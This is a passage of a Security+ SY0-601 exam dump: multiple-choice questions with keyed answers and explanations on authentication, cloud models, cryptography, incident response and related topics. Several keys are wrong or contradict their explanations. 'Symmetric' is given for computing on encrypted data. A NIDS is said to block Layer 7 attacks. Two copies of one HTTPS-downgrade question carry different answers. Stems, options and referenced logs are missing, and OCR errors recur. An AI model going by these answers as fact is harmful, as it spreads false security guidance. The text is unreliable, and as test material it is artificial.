single administrator account followed by suspicious logins from unfamiliar geographic locations.
Which of the following data sources would be BEST to use to assess the accounts impacted by this
attack?
A. User behavior analytics
22 / 142
The safer , easier way to help you pass any IT exams.
B. Dump files
C. Bandwidth monitors
D. Protocol analyzer output
Answer: A
Explanation:
User behavior analytics (UBA) would be the best data source to assess the accounts impacted by the
attack, as it can identify abnormal activity, such as repeated brute-force attacks and logins from
unfamiliar geographic locations, and provide insights into the behavior of the impacted accounts.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 7: Incident
Response, pp. 338-341
55.The Chief information Security Officer has directed the security and networking team to retire the use
of shared passwords on routers and switches.
Which of the following choices BEST meets the requirements?
A. SAML
B. TACACS+
C. Password vaults
D. OAuth
Answer: B
Explanation:
TACACS+ is a protocol used for remote authentication, authorization, and accounting (AAA) that can be
used to replace shared passwords on routers and switches. It provides a more secure method of
authentication that allows for centralized management of access control policies.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 6
56.The Chief Information Security Officer directed a risk reduction in shadow IT and created a policy
requiring all unsanctioned high-risk SaaS applications to be blocked from user access.
Which of the following is the BEST security solution to reduce this risk?
A. CASB
B. VPN concentrator
C. MFA
D. VPC endpoint
Answer: A
Explanation:
A Cloud Access Security Broker (CASB) can be used to monitor and control access to cloud-based
applications, including unsanctioned SaaS applications. It can help enforce policies that prevent access
to high-risk SaaS applications and provide visibility into the use of such applications by employees.
References: CompTIA Security+ SY0-601 Exam Objectives: 3.3 Given a scenario, implement secure
mobile solutions.
57.After a WiFi scan of a local office was conducted, an unknown wireless signal was identified Upon
investigation, an unknown Raspberry Pi device was found connected to an Ethernet port using a single
connection.
Which of the following BEST describes the purpose of this device?
23 / 142
The safer , easier way to help you pass any IT exams.
A. loT sensor
B. Evil twin
C. Rogue access point
D. On-path attack
Answer: C
Explanation:
A Raspberry Pi device connected to an Ethernet port could be configured as a rogue access point,
allowing an attacker to intercept and analyze network traffic or perform other malicious activities.
References: CompTIA Security+ SY0-601 Exam Objectives: 3.2 Given a scenario, implement secure
network architecture concepts.
58.A security analyst reviews a company’s authentication logs and notices multiple authentication
failures. The authentication failures are from different usernames that share the same source IP address.
Which of the password attacks is MOST likely happening?
A. Dictionary
B. Rainbow table
C. Spraying
D. Brute-force
Answer: C
Explanation:
Detailed Explanation:
Password spraying is an attack where an attacker tries a small number of commonly used passwords
against a large number of usernames. The goal of password spraying is to avoid detection by avoiding
too many failed login attempts for any one user account. The fact that different usernames are being
attacked from the same IP address is a strong indication that a password spraying attack is underway.
59.A company was compromised, and a security analyst discovered the attacker was able to get access
to a service account.
The following logs were discovered during the investigation:
Which of the following MOST likely would have prevented the attacker from learning the service account
name?
A. Race condition testing
B. Proper error handling
C. Forward web server logs to a SIEM
D. Input sanitization
Answer: D
Explanation:
Input sanitization can help prevent attackers from learning the service account name by removing
potentially harmful characters from user input, reducing the likelihood of successful injection attacks.
24 / 142
The safer , easier way to help you pass any IT exams.
References:
✑ CompTIA Security+ Certification Exam Objectives 2.2: Given a scenario, implement secure coding
techniques.
✑ CompTIA Security+ Study Guide, Sixth Edition, pages 72-73
60.HOTSPOT
You received the output of a recent vulnerability assessment.
Review the assessment and scan output and determine the appropriate remedialion(s} 'or «ach dewce.
Remediation options may be selected multiple times, and some devices may require more than one
remediation.
If at any time you would like to biing bade the initial state ot the simulation, please dick me Reset All
button.
Answer:
25 / 142
The safer , easier way to help you pass any IT exams.
Explanation:
26 / 142
The safer , easier way to help you pass any IT exams.
61.A company reduced the area utilized in its datacenter by creating virtual networking through
automation and by creating provisioning routes and rules through scripting.
Which of the following does this example describe?
A. laC
B. MSSP
C. Containers
D. SaaS
Answer: A
Explanation:
laaS (Infrastructure as a Service) allows the creation of virtual networks, automation, and scripting to
reduce the area utilized in a datacenter. References: CompTIA Security+ Study Guide, Exam SY0-601,
Chapter 4
62.A global company is experiencing unauthorized logging due to credential theft and account lockouts
27 / 142
The safer , easier way to help you pass any IT exams.
caused by brute-force attacks. The company is considering implementing a third-party identity provider to
help mitigate these attacks.
Which of the following would be the BEST control for the company to require from prospective vendors?
A. IP restrictions
B. Multifactor authentication
C. A banned password list
D. A complex password policy
Answer: B
Explanation:
Multifactor authentication (MFA) would be the best control to require from a third-party identity provider to
help mitigate attacks such as credential theft and brute-force attacks.
References: CompTIA Security+ Study Guide, Exam SY0-601, Chapter 2
63.Which of the following should a technician consider when selecting an encryption method for data
that needs to remain confidential for a specific length of time?
A. The key length of the encryption algorithm
B. The encryption algorithm's longevity
C. A method of introducing entropy into key calculations
D. The computational overhead of calculating the encryption key
Answer: B
Explanation:
When selecting an encryption method for data that needs to remain confidential for a specific length of
time, the longevity of the encryption algorithm should be considered to ensure that the data remains
secure for the required period.
References: CompTIA Security+ Certification Exam Objectives - 3.2 Given a scenario, use appropriate
cryptographic methods. Study Guide: Chapter 4, page 131.
28 / 142
The safer , easier way to help you pass any IT exams.
D. International operations
Answer: D
Explanation:
Data sovereignty refers to the legal concept that data is subject to the laws and regulations of the
country in which it is located. International operations can impact data sovereignty as companies
operating in multiple countries may need to comply with different laws and regulations.
References:
✑ CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 5
66.Which of the following is a cryptographic concept that operates on a fixed length of bits?
A. Block cipher
B. Hashing
C. Key stretching
D. Salting
Answer: A
Explanation:
Single-key or symmetric-key encryption algorithms create a fixed length of bits known as a block cipher
with a secret key that the creator/sender uses to encipher data (encryption) and the receiver uses to
decipher it.
67.A financial institution would like to store its customer data in a cloud but still allow the data to be
accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from
being able to decipher the data due to its sensitivity. The financial institution is not concerned about
computational overheads and slow speeds.
Which of the following cryptographic techniques would BEST meet the requirement?
A. Asymmetric
B. Symmetric
C. Homomorphic
D. Ephemeral
Answer: B
Explanation:
Symmetric encryption allows data to be encrypted and decrypted using the same key. This is useful
when the data needs to be accessed and manipulated while still encrypted. References: CompTIA
Security+ Study Guide, Exam SY0-601, Chapter 6
68.Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?
A. Hashing
B. DNS sinkhole
C. TLS inspection
D. Data masking
Answer: C
Explanation:
an IDS (Intrusion Detection System) and a WAF (Web Application Firewall) are both used to monitor and
protect web applications from common attacks such as cross-site scripting and SQL injection12.
29 / 142
The safer , easier way to help you pass any IT exams.
However, these attacks can also be hidden in encrypted HTTPS traffic, which uses the TLS (Transport
Layer Security) protocol to provide cryptography and authentication between two communicating
applications34. Therefore, in order for an IDS and a WAF to be effective on HTTPS traffic, they need to
be able to decrypt and inspect the data that flows in the TLS tunnel. This is achieved by using a feature
called TLS inspection345, which creates two dedicated TLS connections: one with the web server and
another with the client. The firewall then uses a customer-provided CA (Certificate Authority) certificate to
generate an on-the-fly certificate that replaces the web server certificate and shares it with the client.
This way, the firewall can see the content of the HTTPS traffic and apply the IDS and WAF rules
accordingly34.
70.Which of the following cryptographic concepts would a security engineer utilize while implementing
non-repudiation? (Select TWO)
A. Block cipher
B. Hashing
C. Private key
D. Perfect forward secrecy
E. Salting
F. Symmetric keys
Answer: B,C
Explanation:
Non-repudiation is the ability to ensure that a party cannot deny a previous action or event.
Cryptographic concepts that can be used to implement non-repudiation include hashing and digital
signatures, which use a private key to sign a message and ensure that the signature is unique to the
signer.
References: CompTIA Security+ Certification Exam Objectives (SY0-601)
71.A security analyst needs an overview of vulnerabilities for a host on the network.
Which of the following is the BEST type of scan for the analyst to run to discover which vulnerable
services are running?
A. Non-credentialed
B. Web application
C. Privileged
30 / 142
The safer , easier way to help you pass any IT exams.
D. Internal
Answer: C
Explanation:
Privileged scanning, also known as credentialed scanning, is a type of vulnerability scanning that uses a
valid user account to log in to the target host and examine vulnerabilities from a trusted user’s
perspective. It can provide more accurate and comprehensive results than unprivileged scanning, which
does not use any credentials and only scans for externally visible vulnerabilities.
72.A company uses a drone for precise perimeter and boundary monitoring.
Which of the following should be MOST concerning to the company?
A. Privacy
B. Cloud storage of telemetry data
C. GPS spoofing
D. Weather events
Answer: A
Explanation:
The use of a drone for perimeter and boundary monitoring can raise privacy concerns, as it may capture
video and images of individuals on or near the monitored premises. The company should take measures
to ensure that privacy rights are not violated.
References:
✑ CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 8
73.An organization wants to integrate its incident response processes into a workflow with automated
decision points and actions based on predefined playbooks.
Which of the following should the organization implement?
A. SIEM
B. SOAR
C. EDR
D. CASB
Answer: B
Explanation:
Security Orchestration, Automation, and Response (SOAR) should be implemented to integrate incident
response processes into a workflow with automated decision points and actions based on predefined
playbooks.
References: CompTIA Security+ Study Guide, Exam SY0-601, Chapter 9
31 / 142
The safer , easier way to help you pass any IT exams.
D. It contains the affected systems and disconnects them from the network, preventing further spread of
the attack or breach
Answer: A
Explanation:
The final phase of an incident response plan is the post-incident activity, which involves examining and
documenting how well the team responded, discovering what caused the incident, and determining how
the incident can be avoided in the future.
References:
CompTIA Security+ Certification Exam Objectives - 2.5 Given a scenario, analyze potential indicators to
determine the type of attack. Study Guide: Chapter 5, page 225.
75.As part of the lessons-learned phase, the SOC is tasked with building methods to detect if a previous
incident is happening again.
Which of the following would allow the security analyst to alert the SOC if an event is reoccurring?
A. Creating a playbook within the SOAR
B. Implementing rules in the NGFW
C. Updating the DLP hash database
D. Publishing a new CRL with revoked certificates
Answer: A
Explanation:
Creating a playbook within the Security Orchestration, Automation and Response (SOAR) tool would
allow the security analyst to detect if an event is reoccurring by triggering automated actions based on
the previous incident's characteristics. This can help the SOC to respond quickly and effectively to the
incident.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 7: Incident
Response, pp. 352-354
76.A large enterprise has moved all its data to the cloud behind strong authentication and encryption. A
sales director recently had a laptop stolen, and later, enterprise data was found to have been
compromised from a local database.
Which of the following was the MOST likely cause?
A. Shadow IT
B. Credential stuffing
C. SQL injection
D. Man in the browser
E. Bluejacking
Answer: A
Explanation:
The most likely cause of the enterprise data being compromised from a local database is Shadow IT.
Shadow IT is the use of unauthorized applications or devices by employees to access company
resources. In this case, the sales director's laptop was stolen, and the attacker was able to use it to
access the local database, which was not secured properly, allowing unauthorized access to sensitive
data.
References:
32 / 142
The safer , easier way to help you pass any IT exams.
77.A company wants to modify its current backup strategy to modify its current backup strategy to
minimize the number of backups that would need to be restored in case of data loss.
Which of the following would be the BEST backup strategy?
A. Incremental backups followed by differential backups
B. Full backups followed by incremental backups
C. Delta backups followed by differential backups
D. Incremental backups followed by delta backups
E. Full backup followed by different backups
Answer: B
Explanation:
The best backup strategy for minimizing the number of backups that need to be restored in case of data
loss is full backups followed by incremental backups. This strategy allows for a complete restoration of
data by restoring the most recent full backup followed by the most recent incremental backup.
Reference: CompTIA Security+ Certification Guide, Third Edition (Exam SY0-601) page 126
78.A bad actor tries to persuade someone to provide financial information over the phone in order to gain
access to funds.
Which of the following types of attacks does this scenario describe?
A. Vishing
B. Phishing
C. Spear phishing
D. Whaling
Answer: A
Explanation:
Vishing is a social engineering attack that uses phone calls or voicemail messages to trick people into
divulging sensitive information, such as financial information or login credentials.
79.Which of the following provides a catalog of security and privacy controls related to the United States
federal information systems?
A. GDPR
B. PCI DSS
C. ISO 27000
D. NIST 800-53
Answer: D
Explanation:
NIST 800-53 provides a catalog of security and privacy controls related to the United States federal
information systems.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 3: Architecture and
Design, pp. 123-125
80.A business is looking for a cloud service provider that offers a la carte services, including cloud
backups, VM elasticity, and secure networking.
33 / 142
The safer , easier way to help you pass any IT exams.
Which of the following cloud service provider types should business engage?
A. A laaS
B. PaaS
C. XaaS
D. SaaS
Answer: A
Explanation:
Infrastructure as a Service (IaaS) providers offer a la carte services, including cloud backups, VM
elasticity, and secure networking. With IaaS, businesses can rent infrastructure components such as
virtual machines, storage, and networking from a cloud service provider.
References: CompTIA Security+ Study Guide, pages 233-234
81.A company would like to provide flexibility for employees on device preference. However, the
company is concerned about supporting too many different types of hardware.
Which of the following deployment models will provide the needed flexibility with the GREATEST amount
of control and security over company data and infrastructure?
A. BYOD
B. VDI
C. COPE
D. CYOD
Answer: D
Explanation:
Choose Your Own Device (CYOD) is a deployment model that allows employees to select from a
predefined list of devices. It provides employees with flexibility in device preference while allowing the
company to maintain control and security over company data and infrastructure. CYOD deployment
model provides a compromise between the strict control provided by Corporate-Owned, Personally
Enabled (COPE) deployment model and the flexibility provided by Bring Your Own Device (BYOD)
deployment model.
References: CompTIA Security+ Study Guide, Chapter 6: Securing Application, Data, and Host Security,
6.5 Implement Mobile Device Management, pp. 334-335
82.A cybersecurity administrator needs to implement a Layer 7 security control on a network and block
potential attacks.
Which of the following can block an attack at Layer 7? (Select TWO).
A. HIDS
B. NIPS
C. HSM
D. WAF
E. NAC
F. NIDS
G. Stateless firewall
Answer: D,F
Explanation:
A WAF (Web Application Firewall) and NIDS (Network Intrusion Detection System) are both examples of
34 / 142
The safer , easier way to help you pass any IT exams.
Layer 7 security controls. A WAF can block attacks at the application layer (Layer 7) of the OSI model by
filtering traffic to and from a web server. NIDS can also detect attacks at Layer 7 by monitoring network
traffic for suspicious patterns and behaviors. References: CompTIA Security+ Study Guide, pages 94-95,
116-118
83.A security manager needs to assess the security posture of one of the organization's vendors. The
contract with the vendor does not allow for auditing of the vendor's security controls.
Which of (he following should the manager request to complete the assessment?
A. A service-level agreement
B. A business partnership agreement
C. A SOC 2 Type 2 report
D. A memorandum of understanding
Answer: C
Explanation:
SOC 2 (Service Organization Control 2) is a type of audit report that evaluates the controls of service
providers to verify their compliance with industry standards for security, availability, processing integrity,
confidentiality, and privacy. A Type 2 report is based on an audit that tests the effectiveness of the
controls over a period of time, unlike a Type 1 report which only evaluates the design of the controls at a
specific point in time.
A SOC 2 Type 2 report would provide evidence of the vendor's security controls and how effective they
are over time, which can help the security manager assess the vendor's security posture despite the
vendor not allowing for a direct audit.
The security manager should request a SOC 2 Type 2 report to assess the security posture of the
vendor. References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 5
84.A security engineer is installing a WAF to protect the company's website from malicious web requests
over SSL.
Which of the following is needed to meet the objective?
A. A reverse proxy
B. A decryption certificate
C. A split-tunnel VPN
D. Load-balanced servers
Answer: B
Explanation:
A Web Application Firewall (WAF) is a security solution that protects web applications from various types
of attacks such as SQL injection, cross-site scripting (XSS), and others. It is typically deployed in front of
web servers to inspect incoming traffic and filter out malicious requests.
To protect the company’s website from malicious web requests over SSL, a decryption certificate is
needed to decrypt the SSL traffic before it reaches the WAF. This allows the WAF to inspect the traffic
and filter out malicious requests.
85.A store receives reports that shoppers’ credit card information is being stolen. Upon further analysis,
those same shoppers also withdrew money from an ATM in that store.
The attackers are using the targeted shoppers’ credit card information to make online purchases.
35 / 142
The safer , easier way to help you pass any IT exams.
86.Which of the following describes a maintenance metric that measures the average time required to
troubleshoot and restore failed equipment?
A. RTO
B. MTBF
C. MTTR
D. RPO
Answer: C
Explanation:
Mean Time To Repair (MTTR) is a maintenance metric that measures the average time required to
troubleshoot and restore failed equipment.
References: CompTIA Security+ Certification Exam Objectives - 4.6 Explain the importance of secure
coding practices. Study Guide: Chapter 7, page 323.
87.As part of annual audit requirements, the security team performed a review of exceptions to the
company policy that allows specific users the ability to use USB storage devices on their laptops.
The review yielded the following results.
• The exception process and policy have been correctly followed by the majority of users
• A small number of users did not create tickets for the requests but were granted access
• All access had been approved by supervisors.
• Valid requests for the access sporadically occurred across multiple departments.
• Access, in most cases, had not been removed when it was no longer needed
Which of the following should the company do to ensure that appropriate access is not disrupted but
unneeded access is removed in a reasonable time frame?
A. Create an automated, monthly attestation process that removes access if an employee's
supervisor denies the approval
B. Remove access for all employees and only allow new access to be granted if the employee's
supervisor approves the request
C. Perform a quarterly audit of all user accounts that have been granted access and verify the
exceptions with the management team
D. Implement a ticketing system that tracks each request and generates reports listing which employees
actively use USB storage devices
Answer: A
36 / 142
The safer , easier way to help you pass any IT exams.
Explanation:
According to the CompTIA Security+ SY0-601 documents, the correct answer option is A. Create an
automated, monthly attestation process that removes access if an employee’s supervisor denies the
approval12.
This option ensures that appropriate access is not disrupted but unneeded access is removed in a
reasonable time frame by requiring supervisors to approve or deny the exceptions on a regular basis. It
also reduces the manual workload of the security team and improves the compliance with the company
policy.
89.Ann, a customer, received a notification from her mortgage company stating her PII may be shared
with partners, affiliates, and associates to maintain day-to-day business operations.
Which of the following documents did Ann receive?
A. An annual privacy notice
B. A non-disclosure agreement
C. A privileged-user agreement
D. A memorandum of understanding
Answer: A
Explanation:
Ann received an annual privacy notice from her mortgage company. An annual privacy notice is a
statement from a financial institution or creditor that outlines the institution's privacy policy and explains
how the institution collects, uses, and shares customers' personal information. It informs the customer
about their rights under the Gramm-Leach-Bliley Act (GLBA) and the institution's practices for protecting
their personal information.
References:
✑ CompTIA Security+ Certification Exam Objectives - Exam SY0-601
90.Which of the following environments can be stood up in a short period of time, utilizes either dummy
data or actual data, and is used to demonstrate and model system capabilities and functionality for a
fixed, agreed-upon duration of time?
37 / 142
The safer , easier way to help you pass any IT exams.
A. PoC
B. Production
C. Test
D. Development
Answer: A
Explanation:
A proof of concept (PoC) environment can be stood up quickly and is used to demonstrate and model
system capabilities and functionality for a fixed, agreed-upon duration of time. This environment can
utilize either dummy data or actual data.
References: CompTIA Security+ Certification Guide, Exam SY0-501
92.A security analyst needs to implement an MDM solution for BYOD users that will allow the company
to retain control over company emails residing on the devices and limit data exfiltration that might occur if
the devices are lost or stolen.
Which of the following would BEST meet these requirements? (Select TWO).
A. Full-device encryption
B. Network usage rules
C. Geofencing
D. Containerization
E. Application whitelisting
F. Remote control
Answer: D,E
Explanation:
MDM solutions emerged to solve problems created by BYOD. With MDM, IT teams can remotely wipe
devices clean if they are lost or stolen. MDM also makes the life of an IT administrator a lot easier as it
allows them to enforce corporate policies, apply software updates, and even ensure that password
protection is used on each device. Containerization and application whitelisting are two features of MDM
that can help retain control over company emails residing on the devices and limit data exfiltration that
might occur if the devices are lost or stolen.
Containerization is a technique that creates a separate and secure space on the device for work-related
data and applications. This way, personal and corporate data are isolated from each other, and IT
admins can manage only the work container without affecting the user’s privacy. Containerization also
allows IT admins to remotely wipe only the work container if needed, leaving the personal data intact.
38 / 142
The safer , easier way to help you pass any IT exams.
Application whitelisting is a technique that allows only authorized applications to run on the device. This
way, IT admins can prevent users from installing or using malicious or unapproved applications that
might compromise the security of corporate data. Application whitelisting also allows IT admins to control
which applications can access corporate resources, such as email servers or cloud storage.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.office1.com/blog/byod-vs-mdm
93.The Chief Information Security Officer wants to pilot a new adaptive, user-based authentication
method. The concept Includes granting logical access based on physical location and proximity.
Which of the following Is the BEST solution for the pilot?
A. Geofencing
B. Self-sovereign identification
C. PKl certificates
D. SSO
Answer: A
Explanation:
Geofencing is a location-based technology that allows an organization to define and enforce logical
access control policies based on physical location and proximity. Geofencing can be used to grant or
restrict access to systems, data, or facilities based on an individual's location, and it can be integrated
into a user's device or the infrastructure. This makes it a suitable solution for the pilot project to test the
adaptive, user-based authentication method that includes granting logical access based on physical
location and proximity.
Reference: CompTIA Security+ SY0-601 Official Text Book, Chapter 4: "Identity and Access
Management".
94.The Chief Executive Officer announced a new partnership with a strategic vendor and asked the
Chief Information Security Officer to federate user digital identities using SAML-based protocols.
Which of the following will this enable?
A. SSO
B. MFA
C. PKI
D. OLP
Answer: A
Explanation:
Federating user digital identities using SAML-based protocols enables Single Sign-On (SSO), which
allows users to log in once and access multiple applications without having to enter their credentials for
each one.
References:
✑ CompTIA Security+ Certification Exam Objectives 1.3: Explain authentication and access controls.
✑ CompTIA Security+ Study Guide, Sixth Edition, pages 41-42
39 / 142
The safer , easier way to help you pass any IT exams.
96.A security assessment found that several embedded systems are running unsecure protocols. These
Systems were purchased two years ago and the company that developed them is no longer in business.
Which of the following constraints BEST describes the reason the findings cannot be remediated?
A. inability to authenticate
B. Implied trust
C. Lack of computing power
D. Unavailable patch
Answer: D
Explanation:
If the systems are running unsecure protocols and the company that developed them is no longer in
business, it is likely that there are no patches available to remediate the issue.
References:
✑ CompTIA Security+ Certification Exam Objectives 1.6: Given a scenario, implement secure protocols.
✑ CompTIA Security+ Study Guide, Sixth Edition, pages 35-36
97.A company would like to set up a secure way to transfer data between users via their mobile phones.
The company's top pnonty is utilizing technology that requires users to be in as close proximity as
possible to each other.
Which of the following connection methods would BEST fulfill this need?
A. Cellular
B. NFC
C. Wi-Fi
D. Bluetooth
Answer: B
Explanation:
NFC allows two devices to communicate with each other when they are in close proximity to each other,
40 / 142
The safer , easier way to help you pass any IT exams.
typically within 5 centimetres. This makes it the most secure connection method for the company's data
transfer requirements.
98.A network engineer and a security engineer are discussing ways to monitor network operations.
Which of the following is the BEST method?
A. Disable Telnet and force SSH.
B. Establish a continuous ping.
C. Utilize an agentless monitor
D. Enable SNMPv3 With passwords.
Answer: C
Explanation:
An agentless monitor is the best method to monitor network operations because it does not require any
software or agents to be installed on the devices being monitored, making it less intrusive and less likely
to disrupt network operations. This method can monitor various aspects of network operations, such as
traffic, performance, and security.
CompTIA Security+ Study Guide, Sixth Edition (SY0-601), Chapter 4: Attacks, Threats, and
Vulnerabilities, Monitoring and Detection Techniques, pg. 167-170.
99.When planning to build a virtual environment, an administrator need to achieve the following,
• Establish polices in Limit who can create new VMs
• Allocate resources according to actual utilization‘
• Require justication for requests outside of the standard requirements.
• Create standardized categories based on size and resource requirements
Which of the following is the administrator MOST likely trying to do?
A. Implement IaaS replication
B. Product against VM escape
C. Deploy a PaaS
D. Avoid VM sprawl
Answer: D
Explanation:
The administrator is most likely trying to avoid VM sprawl, which occurs when too many VMs are created
and managed poorly, leading to resource waste and increased security risks. The listed actions can help
establish policies, resource allocation, and categorization to prevent unnecessary VM creation and
ensure proper management.
Reference: CompTIA Security+ Certification Exam Objectives, Exam SY0-601, 3.6 Given a scenario,
implement the appropriate virtualization components.
41 / 142
The safer , easier way to help you pass any IT exams.
Answer: E
Explanation:
ISO 27001 is an international standard that outlines the requirements for an Information Security
Management System (ISMS). It provides a framework for managing and protecting sensitive information
using risk management processes. Acquiring an ISO 27001 certification assures customers that the
organization meets security standards and follows best practices for information security management. It
helps to build customer trust and confidence in the organization's ability to protect their sensitive
information. References: CompTIA Security+ Certification Exam Objectives, Exam Domain 1.0: Attacks,
Threats, and Vulnerabilities, 1.2 Given a scenario, analyze indicators of compromise and determine the
type of malware, p. 7
101.The compliance team requires an annual recertification of privileged and non-privileged user access.
However, multiple users who left the company six months ago still have access.
Which of the following would have prevented this compliance violation?
A. Account audits
B. AUP
C. Password reuse
D. SSO
Answer: A
Explanation:
Account audits are periodic reviews of user accounts to ensure that they are being used appropriately
and that access is being granted and revoked in accordance with the organization's policies and
procedures. If the compliance team had been conducting regular account audits, they would have
identified the users who left the company six months ago and ensured that their access was revoked in a
timely manner. This would have prevented the compliance violation caused by these users still having
access to the company's systems.
To prevent this compliance violation, the company should implement account audits. An account audit is
a regular review of all user accounts to ensure that they are being used properly and that they are in
compliance with the company's security policies. By conducting regular account audits, the company can
identify inactive or unused accounts and remove access for those users. This will help to prevent
compliance violations and ensure that only authorized users have access to the company's systems and
data.
42 / 142
The safer , easier way to help you pass any IT exams.
Answer: C,D
Explanation:
An identity provider (IdP) is responsible for authenticating users and generating security tokens
containing user information. A service provider (SP) is responsible for accepting security tokens and
granting access to resources based on the user's identity.
103.During a Chief Information Security Officer (CISO) convention to discuss security awareness, the
attendees are provided with a network connection to use as a resource. As the convention progresses,
one of the attendees starts to notice delays in the connection, and the HIIPS site requests are reverting
to HTTP.
Which of the following BEST describes what is happening?
A. Birthday collision on the certificate key
B. DNS hijacking to reroute traffic
C. Brute force to the access point
D. ASSLILS downgrade
Answer: B
Explanation:
The attendee is experiencing delays in the connection, and the HIIPS site requests are reverting to
HTTP, indicating that the DNS resolution is redirecting the connection to another server. DNS hijacking is
a technique that involves redirecting a user’s requests for a domain name to a different IP address.
Attackers use DNS hijacking to redirect users to malicious websites and steal sensitive information, such
as login credentials and credit card details.
Reference: https://www.cloudflare.com/learning/dns/dns-hijacking/
104.A company installed several crosscut shredders as part of increased information security practices
targeting data leakage risks.
Which of the following will this practice reduce?
A. Dumpster diving
B. Shoulder surfing
C. Information elicitation
D. Credential harvesting
Answer: A
Explanation:
Crosscut shredders are used to destroy paper documents and reduce the risk of data leakage through
dumpster diving. Dumpster diving is a method of retrieving sensitive information from paper waste by
searching through discarded documents.
References:
✑ CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 2
105.Which of the following is the MOST secure but LEAST expensive data destruction method for data
that is stored on hard drives?
A. Pulverizing
B. Shredding
C. Incinerating
43 / 142
The safer , easier way to help you pass any IT exams.
D. Degaussing
Answer: B
Explanation:
Shredding may be the most secure and cost-effective way to destroy electronic data in any media that
contain hard drives or solid-state drives and have reached their end-of-life1. Shredding reduces
electronic devices to pieces no larger than 2 millimeters2. Therefore, shredding is the most secure but
least expensive data destruction method for data that is stored on hard drives.
106.one of the attendees starts to notice delays in the connection. and the HTTPS site requests are
reverting to HTTP.
Which of the following BEST describes what is happening?
A. Birthday collision on the certificate key
B. DNS hacking to reroute traffic
C. Brute force to the access point
D. A SSL/TLS downgrade
Answer: D
Explanation:
The scenario describes a Man-in-the-Middle (MitM) attack where the attacker intercepts traffic and
downgrades the secure SSL/TLS connection to an insecure HTTP connection. This type of attack is
commonly known as SSL/TLS downgrade attack or a stripping attack. The attacker is able to see and
modify the communication between the client and server.
107.An organization's Chief Information Security Officer is creating a position that will be responsible for
implementing technical controls to protect data, including ensuring backups are properly maintained.
Which of the following roles would MOST likely include these responsibilities?
A. Data protection officer
B. Data owner
C. Backup administrator
D. Data custodian
E. Internal auditor
Answer: D
Explanation:
The responsibilities of ensuring backups are properly maintained and implementing technical controls to
protect data are the responsibilities of the data custodian role.
References: CompTIA Security+ Study Guide by Emmett Dulaney, Chapter 7: Securing Hosts and Data,
Data Custodian
108.A security engineer is installing a WAF to protect the company's website from malicious web
requests over SSL.
Which of the following is needed to meet the objective?
A. A reverse proxy
B. A decryption certificate
C. A spill-tunnel VPN
D. Load-balanced servers
44 / 142
The safer , easier way to help you pass any IT exams.
Answer: B
Explanation:
A Web Application Firewall (WAF) is a security solution that protects web applications from various types
of attacks such as SQL injection, cross-site scripting (XSS), and others. It is typically deployed in front of
web servers to inspect incoming traffic and filter out malicious requests.
To protect the company’s website from malicious web requests over SSL, a decryption certificate is
needed to decrypt the SSL traffic before it reaches the WAF. This allows the WAF to inspect the traffic
and filter out malicious requests.
109.A systems analyst determines the source of a high number of connections to a web server that were
initiated by ten different IP addresses that belong to a network block in a specific country.
Which of the following techniques will the systems analyst MOST likely implement to address this issue?
A. Content filter
B. SIEM
C. Firewall rules
D. DLP
Answer: C
Explanation:
A firewall is a network security system that monitors and controls incoming and outgoing network traffic
based on predetermined security rules. The systems analyst can use firewall rules to block connections
from the ten IP addresses in question, or from the entire network block in the specific country. This would
be a quick and effective way to address the issue of high connections to the web server initiated by these
IP addresses.
Reference: CompTIA Security+ SY0-601 Official Text Book, Chapter 5: "Network Security".
110.Which of the following would produce the closet experience of responding to an actual incident
response scenario?
A. Lessons learned
B. Simulation
C. Walk-through
D. Tabletop
Answer: B
Explanation:
A simulation exercise is designed to create an experience that is as close as possible to a real-world
incident response scenario. It involves simulating an attack or other security incident and then having
security personnel respond to the situation as they would in a real incident. References: CompTIA
Security+ SY0-601 Exam Objectives: 1.1 Explain the importance of implementing security concepts,
methodologies, and practices.
111.The Chief Technology Officer of a local college would like visitors to utilize the school's WiFi but must
be able to associate potential malicious activity to a specific person.
Which of the following would BEST allow this objective to be met?
A. Requiring all new, on-site visitors to configure their devices to use WPS
B. Implementing a new SSID for every event hosted by the college that has visitors
45 / 142
The safer , easier way to help you pass any IT exams.
C. Creating a unique PSK for every visitor when they arrive at the reception area
D. Deploying a captive portal to capture visitors' MAC addresses and names
Answer: D
Explanation:
A captive portal is a web page that requires visitors to authenticate or agree to an acceptable use policy
before allowing access to the network. By capturing visitors' MAC addresses and names, potential
malicious activity can be traced back to a specific person.
112.Which of the following environments typically hosts the current version configurations and code,
compares user-story responses and workflow, and uses a modified version of actual data for testing?
A. Development
B. Staging
C. Production
D. Test
Answer: B
Explanation:
Staging is an environment in the software development lifecycle that is used to test a modified version of
the actual data, current version configurations, and code. This environment compares user-story
responses and workflow before the software is released to the production environment. References:
CompTIA Security+ Study Guide, Sixth Edition, Sybex, pg. 496
113.Which of the following BEST describes data streams that are compiled through artificial intelligence
that provides insight on current cyberintrusions, phishing, and other malicious cyberactivity?
A. Intelligence fusion
B. Review reports
C. Log reviews
D. Threat feeds
Answer: A
Explanation:
Intelligence fusion is a process that involves aggregating and analyzing data from multiple sources,
including artificial intelligence, to provide insight on current cyberintrusions, phishing, and other malicious
cyberactivity.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Glossary, p.767.
114.A new plug-and-play storage device was installed on a PC in the corporate environment.
Which of the following safeguards will BEST help to protect the PC from malicious files on the storage
device?
A. Change the default settings on the PC.
B. Define the PC firewall rules to limit access.
C. Encrypt the disk on the storage device.
D. Plug the storage device in to the UPS
Answer: A
Explanation:
The best option that will help to protect the PC from malicious files on the storage device would be A.
46 / 142
The safer , easier way to help you pass any IT exams.
Change the default settings on the PC. Changing the default settings on the PC can include disabling the
autorun or autoplay feature, which can prevent malicious files from executing automatically when the
storage device is plugged in. Changing the default settings can also include enabling antivirus software,
updating the operating system and applications, and configuring user account control and permissions.
115.Which of the following disaster recovery tests is the LEAST time consuming for the disaster recovery
team?
A. Tabletop
